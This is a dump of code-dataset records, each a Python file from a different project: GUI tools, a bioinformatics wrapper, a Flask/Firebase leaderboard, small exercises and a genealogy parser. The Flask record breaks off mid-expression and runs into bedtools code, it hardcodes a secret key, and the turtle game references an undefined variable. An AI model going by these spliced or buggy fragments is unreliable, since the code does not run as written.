QZoneEditError(QExceptionDefines.QTSQLERR_PREPAREQUERYFAILED(), 'Cannot prepare sql query.', initQuery)\n\t\t\tinitQuery.bindValue(\":idZone\", id)\n\t\t\tif not initQuery.exec_(): raise QZoneEditError(QExceptionDefines.QTSQLERR_EXECQUERYFAILED(), 'Cannot exec sql query.', initQuery)\n\t\t\tif not initQuery.first(): raise QZoneEditError(QExceptionDefines.QTSQLERR_GETFIRSTRECFAILED(), 'Cannot get Zone Name.')\n\t\t\tif not isinstance(initQuery.value(0), QtCore.QPyNullVariant): self.ledZoneName.setText(str(initQuery.value(0)))\n\t\t\tif not isinstance(initQuery.value(1), QtCore.QPyNullVariant): self.ledTariff.setText(str(initQuery.value(1)))\n\n\t\texcept QZoneEditError as err:\n\t\t\tprint (err.code, err.message, '\\n', err.sqlQuery.lastQuery(), err.sqlQuery.lastError().text())","sub_path":"src/Zones_Edit_Window.py","file_name":"Zones_Edit_Window.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189193245","text":"import numpy as np\r\n\r\n# Sum the array with all columns\r\nx = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]])\r\nv = np.array([1, 0, 1])\r\ny = np.empty_like(x)\r\n\r\nfor i in range(4):\r\n y[i, :] = x[i, :] + v\r\n\r\nprint(y)\r\n","sub_path":"Numpy-Assignment/np_broadcast.py","file_name":"np_broadcast.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224501289","text":"import subprocess\n\nimport govnsiblecli.modules.base.utils.display\nfrom shlex import split\nfrom govnsiblecli.modules import ModuleBase\n\n\nlogger = govnsiblecli.modules.base.utils.display.get_logger('root')\n\nMOD_INFO = {\n 'module_name': 'lineinfile',\n 'module_type': 'general',\n 'module_desc': 'Module to execute shell commands'\n}\n\n\ndef mod_info():\n return MOD_INFO\n\n\nclass GovnsibleModule(ModuleBase):\n def __init__(self,params):\n super(GovnsibleModule, 
self).__init__()\n self.params = params\n self.result = None\n\n def execute_task(self):\n task_params = self.params\n shell_command = task_params.get('command')\n command = split(shell_command)\n result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n self.result = result.stdout\n","sub_path":"govnsiblecli/modules/general/lineinfile.py","file_name":"lineinfile.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23862678","text":"import turtle\nimport pandas\n\ndata = pandas.read_csv(\"countries.csv\")\nall_countries = data.state.to_list()\n\nscreen = turtle.Screen()\nscreen.setup()\nscreen.title(\"U.S.A States Game\")\nimage = \"./europe_map.gif\"\nscreen.addshape(image)\nturtle.shape(image)\n\n# def get_click(x,y):\n# print(x,y)\n#\n# turtle.onscreenclick(get_click)\n# turtle.mainloop()\n\ncountries_guessed = []\nwhile len(country_guessed)<37:\n answer_country = screen.textinput(title=f\"({len(country_guessed)}/37 countries guessed).\", prompt=\"Guess Another Country \").title()\n\n if answer_country == \"Exit\":\n missing_countries = [country for country in all_countries if country not in countries_guessed]\n new_data = pandas.DataFrame(missing_countries)\n new_data.to_csv(\"countries_to_learn.csv\")\n break\n if answer_country in all_countries:\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n state_info = data[data.state == answer_country]\n t.goto(int(state_info.x), int(state_info.y))\n t.write(f\"{answer_country}\",align=\"center\",font=(\"Arial\",7,\"bold\"))\n country_guessed.append(answer_country)\n\n","sub_path":"Day-27__Guess-The-European-Country-Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326257515","text":"from flask import Flask, render_template, url_for, request, 
redirect\nimport firebase_admin\nfrom firebase_admin import db\nimport os\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'abc123@567$#'\n\n# Initialize Firebase app\nfirebase_admin.initialize_app(options={'databaseURL': 'https://vitask.firebaseio.com/'})\nref = db.reference('vitask')\n\ndef fetch_data():\n data = ref.child(\"owasp\").child(\"leaderboard\").get()\n return data\n\n@app.route('/', methods=['GET','POST'])\ndef index():\n users = fetch_data()\n ranking = []\n for i in users:\n ranking.append(users[i])\n \n for i in range(0,len(ranking)):\n for j in range(0,len(ranking)-i-1):\n if(ranking[j][\"Rating\"] {3} !LOG2!\".format(bedtools, bed, bam,\n read_counts, ref_idx, min_overlap_a)\n\n return cmd\n\n\n # get the output file name to store coverage stats\n coverage_report = self.get_output(\"coverage_report\")\n\n # Generating coverage command\n cmd = \"{0} coverage -a {1} -b {2} -sorted -g {4} -f {5} > {3} !LOG2!\".format(bedtools,bed,bam,coverage_report,\n ref_idx, min_overlap_a)\n\n return cmd\n \nclass Intersect(Module):\n def __init__(self, module_id, is_docker = False):\n super(Intersect, self).__init__(module_id, is_docker)\n self.output_keys = [\"region_read_counts\"]\n\n def define_input(self):\n self.add_argument(\"bam\", is_required=True)\n self.add_argument(\"bam_idx\", is_required=True)\n self.add_argument(\"region_bed\", is_required=True, is_resource=True)\n self.add_argument(\"bedtools\", is_required=True, is_resource=True)\n self.add_argument(\"count_reads\", is_required=True, default_value=True)\n self.add_argument(\"nr_cpus\", is_required=True, default_value=2)\n self.add_argument(\"mem\", is_required=True, default_value=8)\n\n def define_output(self):\n\n if self.get_argument(\"count_reads\"):\n # Declare reads count output filename\n region_read_counts = self.generate_file_name(\".read.counts.txt\")\n self.add_output(\"region_read_counts\", region_read_counts)\n\n def define_command(self):\n # Define command for running bedtools 
coverage from a platform\n bam = self.get_argument(\"bam\")\n region_bed = self.get_argument(\"region_bed\")\n bedtools = self.get_argument(\"bedtools\")\n count_reads = self.get_argument(\"count_reads\")\n\n if count_reads:\n # get the output file name to store coverage stats\n region_read_counts = self.get_output(\"region_read_counts\")\n\n # Generating coverage command for read counts\n cmd = f\"{bedtools} intersect -a {region_bed} -b {bam} -c > {region_read_counts} !LOG2!\"\n\n return cmd\n","sub_path":"Modules/Tools/Bedtools.py","file_name":"Bedtools.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580337717","text":"# -*- coding: utf-8 -*-\n# Advanced zoom example. Like in Google Maps.\n# It zooms only a tile, but not the whole image. So the zoomed tile occupies\n# constant memory and not crams it with a huge resized image for the large zooms.\nimport random\nimport tkinter as tk\nimport platform\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\n\nOS = platform.system()\n\nclass AutoScrollbar(ttk.Scrollbar):\n ''' A scrollbar that hides itself if it's not needed.\n Works only if you use the grid geometry manager '''\n def set(self, lo, hi):\n if float(lo) <= 0.0 and float(hi) >= 1.0:\n self.grid_remove()\n else:\n self.grid()\n ttk.Scrollbar.set(self, lo, hi)\n\n def pack(self, **kw):\n raise tk.TclError('Cannot use pack with this widget')\n\n def place(self, **kw):\n raise tk.TclError('Cannot use place with this widget')\n\nclass Zoom_Advanced(ttk.Frame):\n ''' Advanced zoom of the image '''\n def __init__(self, mainframe, path):\n ''' Initialize the main Frame '''\n ttk.Frame.__init__(self, master=mainframe)\n self.master.title('Zoom with mouse wheel')\n self.master.geometry('800x600')\n # Vertical and horizontal scrollbars for canvas\n vbar = AutoScrollbar(self.master, orient='vertical')\n hbar = AutoScrollbar(self.master, orient='horizontal')\n 
vbar.grid(row=0, column=1, sticky='ns')\n hbar.grid(row=1, column=0, sticky='we')\n # Create canvas and put image on it\n self.canvas = tk.Canvas(self.master, highlightthickness=0,\n xscrollcommand=hbar.set, yscrollcommand=vbar.set)\n self.canvas.grid(row=0, column=0, sticky='nswe')\n self.canvas.update() # wait till canvas is created\n vbar.configure(command=self.scroll_y) # bind scrollbars to the canvas\n hbar.configure(command=self.scroll_x)\n # Make the canvas expandable\n self.master.rowconfigure(0, weight=1)\n self.master.columnconfigure(0, weight=1)\n # Bind events to the Canvas\n self.canvas.bind('', self.show_image) # canvas is resized\n self.canvas.bind('', self.move_from)\n self.canvas.bind('', self.move_to)\n self.canvas.bind('', self.wheel) # with Windows and MacOS, but not Linux\n self.canvas.bind('', self.wheel) # only with Linux, wheel scroll down\n self.canvas.bind('', self.wheel) # only with Linux, wheel scroll up\n self.image = Image.open(path) # open image\n self.width, self.height = self.image.size\n self.imscale = 1.0 # scale for the canvaas image\n self.delta = 1.3 # zoom magnitude\n # Put image into container rectangle and use it to set proper coordinates to the image\n self.container = self.canvas.create_rectangle(0, 0, self.width, self.height, width=0)\n # Plot some optional random rectangles for the test purposes\n minsize, maxsize, number = 5, 20, 10\n for n in range(number):\n x0 = random.randint(0, self.width - maxsize)\n y0 = random.randint(0, self.height - maxsize)\n x1 = x0 + random.randint(minsize, maxsize)\n y1 = y0 + random.randint(minsize, maxsize)\n color = ('red', 'orange', 'yellow', 'green', 'blue')[random.randint(0, 4)]\n self.canvas.create_rectangle(x0, y0, x1, y1, fill=color, activefill='black')\n self.show_image()\n\n def scroll_y(self, *args):\n ''' Scroll canvas vertically and redraw the image '''\n self.canvas.yview(*args) # scroll vertically\n self.show_image() # redraw the image\n\n def scroll_x(self, *args):\n ''' 
Scroll canvas horizontally and redraw the image '''\n self.canvas.xview(*args) # scroll horizontally\n self.show_image() # redraw the image\n\n def move_from(self, event):\n ''' Remember previous coordinates for scrolling with the mouse '''\n self.canvas.scan_mark(event.x, event.y)\n\n def move_to(self, event):\n ''' Drag (move) canvas to the new position '''\n self.canvas.scan_dragto(event.x, event.y, gain=1)\n self.show_image() # redraw the image\n\n def wheel(self, event):\n ''' Zoom with mouse wheel '''\n x = self.canvas.canvasx(event.x)\n y = self.canvas.canvasy(event.y)\n bbox = self.canvas.coords(self.container) # get image area\n if bbox[0] < x < bbox[2] and bbox[1] < y < bbox[3]: pass # Ok! Inside the image\n else: return # zoom only inside image area\n scale = 1.0\n if OS == 'Darwin':\n if event.delta<0: # scroll down\n i = min(self.width, self.height)\n if int(i * self.imscale) < 30: return # image is less than 30 pixels\n self.imscale /= self.delta\n scale /= self.delta\n if event.delta>0: # scroll up\n i = min(self.canvas.winfo_width(), self.canvas.winfo_height())\n if i < self.imscale: return # 1 pixel is bigger than the visible area\n self.imscale *= self.delta\n scale *= self.delta\n else:\n # Respond to Linux (event.num) or Windows (event.delta) wheel event\n if event.num == 5 or event.delta == -120: # scroll down\n i = min(self.width, self.height)\n if int(i * self.imscale) < 30: return # image is less than 30 pixels\n self.imscale /= self.delta\n scale /= self.delta\n if event.num == 4 or event.delta == 120: # scroll up\n i = min(self.canvas.winfo_width(), self.canvas.winfo_height())\n if i < self.imscale: return # 1 pixel is bigger than the visible area\n self.imscale *= self.delta\n scale *= self.delta\n self.canvas.scale('all', x, y, scale, scale) # rescale all canvas objects\n self.show_image()\n\n def show_image(self, event=None):\n ''' Show image on the canvas '''\n box_image = self.canvas.coords(self.container) # get image area\n 
box_canvas = (self.canvas.canvasx(0), # get visible area of the canvas\n self.canvas.canvasy(0),\n self.canvas.canvasx(self.canvas.winfo_width()),\n self.canvas.canvasy(self.canvas.winfo_height()))\n box_img_int = tuple(map(int, box_image)) # convert to integer or it will not work properly\n # Get scroll region box\n box_scroll = [min(box_img_int[0], box_canvas[0]), min(box_img_int[1], box_canvas[1]),\n max(box_img_int[2], box_canvas[2]), max(box_img_int[3], box_canvas[3])]\n # Horizontal part of the image is in the visible area\n if box_scroll[0] == box_canvas[0] and box_scroll[2] == box_canvas[2]:\n box_scroll[0] = box_img_int[0]\n box_scroll[2] = box_img_int[2]\n # Vertical part of the image is in the visible area\n if box_scroll[1] == box_canvas[1] and box_scroll[3] == box_canvas[3]:\n box_scroll[1] = box_img_int[1]\n box_scroll[3] = box_img_int[3]\n # Convert scroll region to tuple and to integer\n self.canvas.configure(scrollregion=tuple(map(int, box_scroll))) # set scroll region\n x1 = max(box_canvas[0] - box_image[0], 0) # get coordinates (x1,y1,x2,y2) of the image tile\n y1 = max(box_canvas[1] - box_image[1], 0)\n x2 = min(box_canvas[2], box_image[2]) - box_image[0]\n y2 = min(box_canvas[3], box_image[3]) - box_image[1]\n if int(x2 - x1) > 0 and int(y2 - y1) > 0: # show image if it in the visible area\n image = self.image.crop((int(x1 / self.imscale), int(y1 / self.imscale),\n int(x2 / self.imscale), int(y2 / self.imscale)))\n imagetk = ImageTk.PhotoImage(image.resize((int(x2 - x1), int(y2 - y1))))\n imageid = self.canvas.create_image(max(box_canvas[0], box_img_int[0]),\n max(box_canvas[1], box_img_int[1]),\n anchor='nw', image=imagetk)\n self.canvas.lower(imageid) # set image into background\n self.canvas.imagetk = imagetk # keep an extra reference to prevent garbage-collection\n\npath = '../data/doge.jpg' # place path to your image here\nroot = tk.Tk()\napp = Zoom_Advanced(root, 
path=path)\nroot.mainloop()\n","sub_path":"zoom_advanced2.py","file_name":"zoom_advanced2.py","file_ext":"py","file_size_in_byte":8510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616050517","text":"BLOCKING_POWER = 2\n\n# NOWA KONFIGURACJA\n\n# Ustawienia heurysyk\n\n#LineEmptyOwn\nLINE_WEIGHT = 0.5\nEMPTY_WEIGHT = 0.1\nOWN_WEIGHT = 1.5\nBLOCKING_WEIGHT = 2\nDANGEROUS_SITUATION = 3\nDANGEROUS_MULTI = 5\nOWN_LINE_WEIGHT = 2.5\n\n\n# Rozmiar tablicy\nBOARD_SIZE = 15\n# Głębokość drzewa\nDEFAULT_DEPTH = 1\n# Rozmiar obszaru przeszukiwania możliwych rozwiązań\nBATCH_SIZE = 1\n# Romiar obszaru wyszukiwania wolnych pól\nEMPTY_FIELD_SIZE = 2\n# Rozmiar obszaru przy wyszukiwaniu własnych pól\nOWN_FIELD_SIZE = 3\n# Typy do sprawdzania\nTYPES = [1,2,3,4,5]","sub_path":"Gomoku/Scripts/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"344947182","text":"#-*- coding:utf-8 -*-\n'''\nCreated on Aug 23, 2012\n\n@author: johnny\n'''\n\nimport databases\nimport error\n\nNFS_DEFAULT = {\n 'serviceip': '',\n 'resource': ''\n }\nCIFS_DEFAULT = {\n 'serviceip': '',\n 'resource': '',\n 'username': '',\n 'password': ''\n }\n\n\ndef get_storage_path(host, storage):\n qurey = databases.DBQuery(host)\n keyword = \"description=\\'\" + storage + \"\\'\"\n if not qurey.get_storagepath(keyword):\n raise error.CommonError(\"Storage not found\")\n \n return qurey.get_storagepath(keyword)\n \ndef get_storage_uuid(host, storage):\n qurey = databases.DBQuery(host)\n keyword = \"description=\\'\" + storage + \"\\'\"\n if not qurey.get_storagepath(keyword):\n raise error.CommonError(\"Storage not found\")\n \n return 
qurey.get_storageUuid(keyword)\n","sub_path":"versiontest/libvmd/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"395757634","text":"# Воспроизведите код с лекции 1.5 и дополните его следующим образом:\n\n# Список рецептов должен храниться в отдельном файле в следующем формате:\n# Название блюда\n# Kоличество ингредиентов\n# Название ингредиента | Количество | Единица измерения\n# Пример:\n# Омлет\n# 3\n# Яйца | 2 | шт\n# Молоко | 50 | г\n# Помидор | 100 | мл\n# В одном файле может быть произвольное количество блюд.\n# Читать список рецептов из этого файла.\n# Соблюдайте кодстайл, разбивайте новую логику на функции и не используйте глобальных переменных.\n# Код выглядел следующим образом:\n\n# cook_book = {\n# 'яйчница': [\n# {'ingredient_name': 'яйца', 'quantity': 2, 'measure': 'шт.'},\n# {'ingredient_name': 'помидоры', 'quantity': 100, 'measure': 'гр.'}\n# ],\n# 'стейк': [\n# {'ingredient_name': 'говядина', 'quantity': 300, 'measure': 'гр.'},\n# {'ingredient_name': 'специи', 'quantity': 5, 'measure': 'гр.'},\n# {'ingredient_name': 'масло', 'quantity': 10, 'measure': 'мл.'}\n# ],\n# 'салат': [\n# {'ingredient_name': 'помидоры', 'quantity': 100, 'measure': 'гр.'},\n# {'ingredient_name': 'огурцы', 'quantity': 100, 'measure': 'гр.'},\n# {'ingredient_name': 'масло', 'quantity': 100, 'measure': 'мл.'},\n# {'ingredient_name': 'лук', 'quantity': 1, 'measure': 'шт.'}\n# ]\n# }\n\n\n# def get_shop_list_by_dishes(dishes, person_count):\n# shop_list = {}\n# for dish in dishes:\n# for ingredient in cook_book[dish]:\n# new_shop_list_item = dict(ingredient)\n\n# new_shop_list_item['quantity'] *= person_count\n# if new_shop_list_item['ingredient_name'] not in shop_list:\n# shop_list[new_shop_list_item['ingredient_name']] = new_shop_list_item\n# else:\n# shop_list[new_shop_list_item['ingredient_name']]['quantity'] +=\n# 
new_shop_list_item['quantity']\n# return shop_list\n\n# def print_shop_list(shop_list):\n# for shop_list_item in shop_list.values():\n# print('{} {} {}'.format(shop_list_item['ingredient_name'], shop_list_item['quantity'], \n# shop_list_item['measure']))\n\n# def create_shop_list():\n# person_count = int(input('Введите количество человек: '))\n# dishes = input('Введите блюда в расчете на одного человека (через запятую): ') \\\n# .lower().split(', ')\n# shop_list = get_shop_list_by_dishes(dishes, person_count)\n# print_shop_list(shop_list)\n\n# create_shop_list()\n\ndef get_shop_list_by_dishes(dishes, person_count, cook_book):\n shop_list = {}\n for dish in dishes:\n for ingredient in cook_book[dish]:\n new_shop_list_item = dict(ingredient)\n new_shop_list_item['quantity'] *= person_count\n if new_shop_list_item['ingredient_name'] not in shop_list:\n shop_list[new_shop_list_item['ingredient_name']] = new_shop_list_item\n else:\n shop_list[new_shop_list_item['ingredient_name']]['quantity'] += new_shop_list_item['quantity']\n return shop_list\n\ndef print_shop_list(shop_list):\n for shop_list_item in shop_list.values():\n print('{} {} {}'.format(shop_list_item['ingredient_name'], shop_list_item['quantity'], shop_list_item['measure']))\n\ndef create_shop_list(cook_book):\n person_count = int(input('Введите количество человек: '))\n dishes = input('Введите блюда в расчете на одного человека (через запятую): ').lower().split(', ')\n shop_list = get_shop_list_by_dishes(dishes, person_count, cook_book)\n print_shop_list(shop_list)\n\ndef get_cooking_book(cook_book):\n with open('cooking_book.txt', encoding=\"utf-8\") as file_to_read:\n while True:\n recipe_name = file_to_read.readline().strip()\n if not recipe_name:\n break\n number_of_ingredients = int(file_to_read.readline().strip())\n list_of_ingredients = []\n for i in range(number_of_ingredients):\n ingredient = file_to_read.readline().strip().split(' | ')\n ingredients = {'ingredient_name': ingredient[0], 'quantity': 
int(ingredient[1]), 'measure': ingredient[2]}\n list_of_ingredients.append(ingredients)\n cook_book.update({recipe_name: list_of_ingredients})\n return cook_book\n\ndef main():\n cook_book = {}\n get_cooking_book(cook_book)\n create_shop_list(cook_book)\n\nmain()\n","sub_path":"home_work_2_1/home_work_2_1.py","file_name":"home_work_2_1.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"506262004","text":"# -*- coding:utf-8 -*-\n\nfrom django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nimport random\n\nfrom memory.models import MemoryItem\n\n\ndef display(request):\n \n priority_scale = MemoryItem.PRIORITY_CHOICE\n # Mixed list\n mem_list = list(MemoryItem.objects.all().order_by('?'))\n item = mem_list[0]\n\n return render(request, 'memory/display.html',{\n 'item':item,\n 'priority_scale':priority_scale,\n })\n\ndef change_priority(request, mem_id, new_priority): \n\n item_with_new_priority = get_object_or_404(MemoryItem, pk=mem_id)\n item_with_new_priority.priority = new_priority.encode(\"utf-8\")\n item_with_new_priority.save()\n return HttpResponseRedirect(reverse('memory:display'))\n\ndef suppr(request, mem_id):\n \n item_to_erase = get_object_or_404(MemoryItem, pk=mem_id)\n item_to_erase.delete()\n return HttpResponseRedirect(reverse('memory:display'))\n\ndef add(request):\n\n item = MemoryItem()\n if request.method=='POST':\n item.question = request.POST['question'].encode(\"utf-8\")\n item.answer = request.POST['answer'].encode(\"utf-8\")\n priority = request.POST['priority'].encode(\"utf-8\")\n\n item.save()\n return HttpResponseRedirect(reverse('memory:display'))\n return 
HttpResponse('erreur')","sub_path":"dev1/p2/memory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"181522596","text":"\"\"\"The module for the Nampi data entry form parser.\r\n\r\nClasses:\r\n Nampi_data_entry_form\r\n\"\"\"\r\nimport json\r\nimport logging\r\nfrom datetime import date, datetime\r\nfrom typing import List, Optional\r\n\r\nimport gspread\r\nimport pandas\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nfrom pandas import Series\r\nfrom rdflib.term import URIRef\r\n\r\nfrom modules.appellation import Appellation, Appellation_type\r\nfrom modules.appellation_assignment import Appellation_assignment\r\nfrom modules.aspect import Aspect\r\nfrom modules.author import Author\r\nfrom modules.birth import Birth\r\nfrom modules.burial import Burial\r\nfrom modules.date import Date\r\nfrom modules.death import Death\r\nfrom modules.di_act import Di_act\r\nfrom modules.event import Event\r\nfrom modules.family import Family\r\nfrom modules.gettypesandstati import GetTypesAndStati\r\n# from modules.gender import Gender\r\nfrom modules.group import Group\r\nfrom modules.nampi_graph import Nampi_graph\r\nfrom modules.nampi_type import Nampi_type\r\nfrom modules.person import Person\r\nfrom modules.place import Place\r\nfrom modules.source import Source\r\nfrom modules.source_location import Source_location\r\nfrom modules.source_type import Source_type\r\nfrom modules.title import Title\r\nfrom parsers.nampi_by_josephis.classes.entity_importer_josephis import \\\r\n Entity_Importer_Josephis\r\nfrom parsers.nampi_by_prodomo.classes.date import Dates\r\nfrom parsers.nampi_data_entry_form.nampi_data_entry_form import (\r\n Table, added_investiture_label, family_member_label)\r\n\r\n_types = dict(\r\n Geburt=\"Geburt\",\r\n Abt=\"Abt\",\r\n Beerdigung=\"Beerdigung\",\r\n Beziehung=\"Beziehung\",\r\n 
Bischof=\"Bischof\",\r\n Geschwister=\"Geschwister\",\r\n Konvent=\"Konvent\",\r\n Pfarrvikar=\"Pfarrvikar\",\r\n Priester=\"Priester\",\r\n Subdiakon=\"Subdiakon\",\r\n Taufe=\"Taufe\",\r\n Tod=\"Tod\",\r\n)\r\n\r\n_group_types = {\r\n \"Christian denomination\": Nampi_type.Mona.christian_denomination,\r\n \"Diocese\": Nampi_type.Mona.diocese,\r\n \"Family\": Nampi_type.Mona.family,\r\n \"Monastic community\": Nampi_type.Mona.monastic_community,\r\n \"Parish\": Nampi_type.Mona.parish,\r\n \"Polity\": Nampi_type.Mona.polity,\r\n \"Religious denomination\": Nampi_type.Mona.religious_denomination,\r\n \"Religious order\": Nampi_type.Mona.religious_order,\r\n \"Religious polity\": Nampi_type.Mona.religious_polity,\r\n \"Historic diocese\": Nampi_type.Mona.historic_diocese,\r\n}\r\n\r\n_status_types = {\r\n \"Academic degree\": Nampi_type.Mona.academic_degree,\r\n \"Clergy\": Nampi_type.Mona.clergy,\r\n \"Community subsacristan\": Nampi_type.Mona.community_subsacristan,\r\n \"Community superior\": Nampi_type.Mona.community_superior,\r\n \"Member of a religious community\": Nampi_type.Mona.member_of_a_religious_community,\r\n \"Member of a religious community with manual focus\": Nampi_type.Mona.member_of_a_religious_community_with_manual_focus,\r\n \"Member of a religious community with spiritual focus\": Nampi_type.Mona.member_of_a_religious_community_with_spiritual_focus,\r\n \"Procurator\": Nampi_type.Mona.procurator,\r\n \"Professed member of a religious community\": Nampi_type.Mona.professed_member_of_a_religious_community,\r\n \"Vice community superior\": Nampi_type.Mona.vice_community_superior,\r\n \"Visitator\": Nampi_type.Mona.visitator,\r\n \"Monastic office with spiritual focus\": Nampi_type.Mona.monastic_office_with_spiritual_focus,\r\n \"Monastic office with manual focus\": Nampi_type.Mona.monastic_office_with_manual_focus,\r\n \"Monastic office\": Nampi_type.Mona.monastic_office,\r\n \"Member of a religious community visiting\": 
Nampi_type.Mona.member_of_a_religious_community_visiting,\r\n \"Religious life outside a community\": Nampi_type.Mona.religious_life_outside_a_community,\r\n \"Office in a diocese\": Nampi_type.Mona.office_in_a_diocese,\r\n \"Secular office\": Nampi_type.Mona.secular_office,\r\n \"Educator\": Nampi_type.Mona.educator,\r\n \"Office\": Nampi_type.Mona.office,\r\n \"Ruler of a school\": Nampi_type.Mona.ruler_of_a_school,\r\n \"Status\": Nampi_type.Core.status,\r\n \"Aspect\": Nampi_type.Core.aspect,\r\n \"Unspecified aspect\": Nampi_type.Mona.unspecified_aspect,\r\n}\r\n\r\n_occupation_types = {\r\n \"Administration of a community\": Nampi_type.Mona.administration_of_a_community,\r\n \"Associated parish clergy\": Nampi_type.Mona.associated_parish_clergy,\r\n \"Clergy\": Nampi_type.Mona.clergy,\r\n \"Official\": Nampi_type.Mona.official,\r\n \"Trade\": Nampi_type.Mona.trade,\r\n \"Rule of a community\": Nampi_type.Mona.rule_of_a_community,\r\n \"Monastic office\": Nampi_type.Mona.monastic_office,\r\n \"Secular office\": Nampi_type.Mona.secular_office,\r\n \"Office in a diocese\": Nampi_type.Mona.office_in_a_diocese,\r\n \"Office\": Nampi_type.Mona.office,\r\n \"Educator\": Nampi_type.Mona.educator,\r\n \"Servant\": Nampi_type.Mona.servant,\r\n \"Visitator\": Nampi_type.Mona.visitator,\r\n \"Highly skilled professional\": Nampi_type.Mona.highly_skilled_professional,\r\n \"Rule of a school\": Nampi_type.Mona.rule_of_a_school,\r\n \"Occupation\": Nampi_type.Core.occupation,\r\n \"Aspect\": Nampi_type.Core.aspect,\r\n \"Unspecified aspect\": Nampi_type.Mona.unspecified_aspect,\r\n}\r\n\r\nauthors = [\"Stephan Makowski\", \"Manuela Mayer\", \"Andrea Singh Bottanova\", \"Patrick Fiska\", \"Irene Rabl\"]\r\n\r\n\r\ndef safe_str(row: Series, column: str) -> Optional[str]:\r\n return str(row[column]) if column in row else None\r\n\r\n\r\nEntities_dict = {}\r\n\r\n\r\nclass Nampi_data_entry_form_parser_josephis:\r\n \"\"\"A parser that parses the NAMPI input tables and 
transforms the data to an RDF graph.\"\"\"\r\n\r\n _graph: Nampi_graph\r\n _stati: {}\r\n _occupation: {}\r\n\r\n # Get all Entries from Group_Entities Spreadsheet\r\n def getEntities(self):\r\n logging.info(\"Getting Group_Entites\")\r\n\r\n # Extract and print all of the values\r\n list_of_hashes = GetTypesAndStati(\"Josephis\").getData()\r\n print(\"--Start analyzing 'Josephis_Überarbeitungsformular_ASB' --\")\r\n i = 0\r\n for val in list_of_hashes:\r\n Entry = Entity_Importer_Josephis()\r\n Entry.ExactCite = val[\"Exaktes Zitat\"]\r\n Entry.Enable = val[\"Aufnehmen (x)\"].strip()\r\n Entry.RelTitle = val[\"Religious title\"]\r\n Entry.Forename = val[\"Vorname(n)\"]\r\n Entry.Surename = val[\"Nachname\"]\r\n Entry.Deathdate = val[\"Todesdatum\"]\r\n Entry.Deathdateearly = val[\"Todesdatum (frühest)\"]\r\n Entry.Deathdatelate = val[\"Todesdatum (spätest)\"]\r\n Entry.Deathplace = val[\"Todesort\"]\r\n Entry.DeathplaceGeo = val[\"geonames Todesort (populated place)\"]\r\n Entry.IssuePlace = val[\"Wirkungsort\"]\r\n Entry.IssuePlacegeo = val[\"geonames Wirkungsort (populated place)\"]\r\n Entry.Community = val[\"Group/Community\"]\r\n Entry.Status = val[\"Status (mehrere durch % trennen)\"]\r\n Entry.Status_Nampi = val[\"Status_nampi (name)\"]\r\n Entry.Occupation = val[\"Occupation (mehrere durch % trennen)\"]\r\n Entry.Occupation_Nampi = val[\"Occupation_nampi (name)\"]\r\n Entry.Event = val[\"Eventdefinition_nampi (name)\"]\r\n Entry.Cite = val[\"Zitation (Jahr und Tagesdatum)\"]\r\n Entry.GND = val[\"GND\"]\r\n Entry.Comment = val[\"Kommentar\"]\r\n Entry.Source = val[\"Quellenangabe\"]\r\n\r\n Entities_dict[i] = Entry\r\n i = i + 1\r\n\r\n logging.info(\"Finished Getting Group_Entities\")\r\n print(\"--Ready with 'Josephis_Überarbeitungsformular_ASB' --\")\r\n\r\n def createJosephis(self):\r\n print(\"-- Create entries --\")\r\n logging.info(\"-- Create entries --\")\r\n for index in Entities_dict:\r\n Entry = Entity_Importer_Josephis()\r\n Entry = 
Entities_dict[index]\r\n\r\n # Just do stuff, if Enable == \"X\"\r\n if Entry.Enable.upper() == \"X\":\r\n\r\n # Person\r\n Comment = Entry.Comment\r\n persName = Entry.Forename + \" \" + Entry.Surename\r\n print(\"Create entry: \" + persName)\r\n logging.info(\"-- Create entry: --\" + persName)\r\n person = self.__get_person(persName, Entry.GND)\r\n if Comment:\r\n person.add_comment(Comment)\r\n\r\n # check if Deathdate is valid\r\n date = Entry.Deathdate\r\n datefirst = Entry.Deathdateearly\r\n datelast = Entry.Deathdatelate\r\n\r\n # Geburt / inits\r\n family_names = Entry.Surename\r\n date_value = \"\"\r\n\r\n # Exaktes Datum ist vorhanden. Ansonsten letzt verfügbares Datum nehmen\r\n if len(date) > 0:\r\n date_value = date\r\n elif len(datelast) > 0:\r\n date_value = datelast\r\n\r\n birth = Birth(\r\n self._graph,\r\n person,\r\n latest_date=date_value,\r\n family_name_label=family_names,\r\n )\r\n birth.add_text(Entry.ExactCite, \"la\")\r\n self.__insert_di_act(\r\n birth,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n family = Family(self._graph, family_names)\r\n aspect = Aspect(self._graph, 